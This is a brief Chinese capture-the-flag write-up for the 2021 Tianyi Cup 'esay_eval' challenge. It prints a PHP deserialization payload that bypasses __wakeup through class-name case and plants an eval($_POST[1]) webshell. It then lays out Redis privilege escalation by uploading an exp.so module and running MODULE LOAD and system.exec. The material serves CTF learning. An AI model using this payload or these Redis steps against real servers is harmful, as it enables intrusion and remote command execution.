微信公众号搜"智元新知"关注
微信扫一扫可直接关注哦!

[天翼杯 2021]esay_eval--REDIS

代码pop链子构造不难,问题是反序列化要绕过wakeup,正常就是改数字,但是这里有个正则过滤 注意匹配的是大写字母,而类的名称大小写即可,于是可以绕过

 

反序列化传入一个一句话代码,蚁剑连接

?poc=O:1:%22b%22:2:{s:1:%22a%22;O:1:%22a%22:1:{s:4:%22code%22;s:16:%22eval($_POST[1]);%22;}}

 

发现有文件

 

下载打开

 

 

 发现Redis密码,猜测是Redis提权

 用蚁剑连接Redis

蚁剑Redis插件地址: https://github.com/Medicean/AS_Redis

 

 

先在有权限的目录上传一个exp.so文件

文件地址:https://github.com/Dliv3/redis-rogue-server

 

 

在Redis命令行执行

MODULE LOAD /var/www/html/exp.so
system.exec "命令"

 

 

提权成功

 

 

 

 

 

 

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。

相关推荐